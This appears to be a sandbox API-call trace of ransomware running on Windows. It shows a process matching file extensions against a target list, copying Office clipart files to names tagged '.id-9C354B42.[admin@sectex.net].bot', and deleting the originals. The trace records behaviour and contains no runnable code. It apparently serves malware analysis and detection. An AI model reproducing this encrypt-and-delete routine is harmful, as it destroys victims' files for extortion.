	[0159.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.505] lstrlenW (lpString=".doc") returned 4
	[0159.505] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.505] lstrlenW (lpString=".docx") returned 5
	[0159.505] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.505] lstrlenW (lpString=".pdf") returned 4
	[0159.505] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.505] lstrlenW (lpString=".xls") returned 4
	[0159.505] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.505] lstrlenW (lpString=".xlsx") returned 5
	[0159.505] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.505] lstrlenW (lpString=".ppt") returned 4
	[0159.505] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.505] lstrlenW (lpString=".zip") returned 4
	[0159.505] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.505] lstrlenW (lpString=".rar") returned 4
	[0159.505] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.505] lstrlenW (lpString=".bz2") returned 4
	[0159.505] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.505] lstrlenW (lpString=".7z") returned 3
	[0159.505] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.505] lstrlenW (lpString=".dbf") returned 4
	[0159.505] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.505] lstrlenW (lpString=".1cd") returned 4
	[0159.505] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105974.WMF") returned 63
	[0159.506] lstrlenW (lpString=".jpg") returned 4
	[0159.506] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.506] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.506] lstrlenW (lpString="J0106124.WMF") returned 12
	[0159.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.506] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5812) returned 1
	[0159.506] CloseHandle (hObject=0x3d0) returned 1
	[0159.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf")) returned 0x20
	[0159.507] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.507] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.507] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0159.508] GetLastError () returned 0x0
	[0159.508] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x16b4, lpOverlapped=0x0) returned 1
	[0159.525] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x16c0, lpOverlapped=0x0) returned 1
	[0159.526] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.526] WriteFile (in: hFile=0x398, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.526] SetEndOfFile (hFile=0x398) returned 1
	[0159.526] CloseHandle (hObject=0x398) returned 1
	[0159.526] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.526] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.528] CloseHandle (hObject=0x3d0) returned 1
	[0159.528] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.582] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106124.wmf")) returned 1
	[0159.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.582] lstrlenW (lpString=".doc") returned 4
	[0159.582] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.582] lstrlenW (lpString=".docx") returned 5
	[0159.582] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.582] lstrlenW (lpString=".pdf") returned 4
	[0159.583] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.583] lstrlenW (lpString=".xls") returned 4
	[0159.583] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.583] lstrlenW (lpString=".xlsx") returned 5
	[0159.583] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.583] lstrlenW (lpString=".ppt") returned 4
	[0159.583] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.583] lstrlenW (lpString=".zip") returned 4
	[0159.583] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.583] lstrlenW (lpString=".rar") returned 4
	[0159.583] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.583] lstrlenW (lpString=".bz2") returned 4
	[0159.583] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.583] lstrlenW (lpString=".7z") returned 3
	[0159.583] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.583] lstrlenW (lpString=".dbf") returned 4
	[0159.583] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.583] lstrlenW (lpString=".1cd") returned 4
	[0159.583] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.583] lstrlenW (lpString=".jpg") returned 4
	[0159.583] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.583] lstrlenW (lpString=".doc") returned 4
	[0159.583] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.584] lstrlenW (lpString=".docx") returned 5
	[0159.584] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0159.584] lstrlenW (lpString=".pdf") returned 4
	[0159.584] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.584] lstrlenW (lpString=".xls") returned 4
	[0159.584] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.584] lstrlenW (lpString=".xlsx") returned 5
	[0159.584] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0159.584] lstrlenW (lpString=".ppt") returned 4
	[0159.584] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.584] lstrlenW (lpString=".zip") returned 4
	[0159.584] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.584] lstrlenW (lpString=".rar") returned 4
	[0159.584] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.584] lstrlenW (lpString=".bz2") returned 4
	[0159.584] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.584] lstrlenW (lpString=".7z") returned 3
	[0159.584] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.584] lstrlenW (lpString=".dbf") returned 4
	[0159.584] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.584] lstrlenW (lpString=".1cd") returned 4
	[0159.584] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106124.WMF") returned 63
	[0159.584] lstrlenW (lpString=".jpg") returned 4
	[0159.584] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.585] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.585] lstrlenW (lpString="J0106208.WMF") returned 12
	[0159.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.623] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=11900) returned 1
	[0159.623] CloseHandle (hObject=0x3f0) returned 1
	[0159.623] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf")) returned 0x20
	[0159.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0159.783] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.783] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0159.783] GetLastError () returned 0x0
	[0159.783] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2e7c, lpOverlapped=0x0) returned 1
	[0159.796] WriteFile (in: hFile=0x3c4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2e80, lpOverlapped=0x0) returned 1
	[0159.797] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.797] WriteFile (in: hFile=0x3c4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.797] SetEndOfFile (hFile=0x3c4) returned 1
	[0159.797] CloseHandle (hObject=0x3c4) returned 1
	[0159.797] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.797] SetEndOfFile (hFile=0x3d0) returned 1
	[0159.800] CloseHandle (hObject=0x3d0) returned 1
	[0159.800] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.936] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0106208.wmf")) returned 1
	[0159.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.936] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.936] lstrlenW (lpString=".doc") returned 4
	[0159.936] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.936] lstrlenW (lpString=".docx") returned 5
	[0159.937] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.937] lstrlenW (lpString=".pdf") returned 4
	[0159.937] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.937] lstrlenW (lpString=".xls") returned 4
	[0159.937] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.937] lstrlenW (lpString=".xlsx") returned 5
	[0159.937] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.937] lstrlenW (lpString=".ppt") returned 4
	[0159.937] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.937] lstrlenW (lpString=".zip") returned 4
	[0159.937] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.937] lstrlenW (lpString=".rar") returned 4
	[0159.937] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.937] lstrlenW (lpString=".bz2") returned 4
	[0159.937] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.937] lstrlenW (lpString=".7z") returned 3
	[0159.937] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.937] lstrlenW (lpString=".dbf") returned 4
	[0159.937] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.937] lstrlenW (lpString=".1cd") returned 4
	[0159.937] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.937] lstrlenW (lpString=".jpg") returned 4
	[0159.937] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.937] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.938] lstrlenW (lpString=".doc") returned 4
	[0159.938] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0159.938] lstrlenW (lpString=".docx") returned 5
	[0159.938] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0159.938] lstrlenW (lpString=".pdf") returned 4
	[0159.938] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0159.938] lstrlenW (lpString=".xls") returned 4
	[0159.938] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0159.938] lstrlenW (lpString=".xlsx") returned 5
	[0159.938] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0159.938] lstrlenW (lpString=".ppt") returned 4
	[0159.938] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0159.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.938] lstrlenW (lpString=".zip") returned 4
	[0159.938] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0159.938] lstrlenW (lpString=".rar") returned 4
	[0159.938] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0159.938] lstrlenW (lpString=".bz2") returned 4
	[0159.938] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0159.938] lstrlenW (lpString=".7z") returned 3
	[0159.938] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0159.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.938] lstrlenW (lpString=".dbf") returned 4
	[0159.938] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0159.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.939] lstrlenW (lpString=".1cd") returned 4
	[0159.939] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0159.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0106208.WMF") returned 63
	[0159.939] lstrlenW (lpString=".jpg") returned 4
	[0159.939] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0159.939] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0159.939] lstrlenW (lpString="J0107090.WMF") returned 12
	[0159.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.940] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=14132) returned 1
	[0159.940] CloseHandle (hObject=0x25c) returned 1
	[0159.940] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf")) returned 0x20
	[0159.941] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.941] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.941] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.942] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0159.997] GetLastError () returned 0x0
	[0159.997] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3734, lpOverlapped=0x0) returned 1
	[0160.004] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3740, lpOverlapped=0x0) returned 1
	[0160.006] ReadFile (in: hFile=0x25c, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.006] WriteFile (in: hFile=0x1d8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.006] SetEndOfFile (hFile=0x1d8) returned 1
	[0160.006] CloseHandle (hObject=0x1d8) returned 1
	[0160.006] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.006] SetEndOfFile (hFile=0x25c) returned 1
	[0160.009] CloseHandle (hObject=0x25c) returned 1
	[0160.009] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.009] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107090.wmf")) returned 1
	[0160.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.010] lstrlenW (lpString=".doc") returned 4
	[0160.010] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.010] lstrlenW (lpString=".docx") returned 5
	[0160.010] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0160.010] lstrlenW (lpString=".pdf") returned 4
	[0160.010] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.010] lstrlenW (lpString=".xls") returned 4
	[0160.010] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.010] lstrlenW (lpString=".xlsx") returned 5
	[0160.010] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0160.010] lstrlenW (lpString=".ppt") returned 4
	[0160.010] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.010] lstrlenW (lpString=".zip") returned 4
	[0160.010] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.010] lstrlenW (lpString=".rar") returned 4
	[0160.010] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.010] lstrlenW (lpString=".bz2") returned 4
	[0160.010] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.010] lstrlenW (lpString=".7z") returned 3
	[0160.010] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.010] lstrlenW (lpString=".dbf") returned 4
	[0160.010] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.010] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.011] lstrlenW (lpString=".1cd") returned 4
	[0160.011] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.011] lstrlenW (lpString=".jpg") returned 4
	[0160.011] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.011] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107090.WMF") returned 63
	[0160.011] lstrlenW (lpString=".doc") returned 4
	[0160.011] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.011] lstrlenW (lpString=".docx") returned 5
	[0160.011] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0160.011] lstrlenW (lpString=".pdf") returned 4
	[0160.011] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
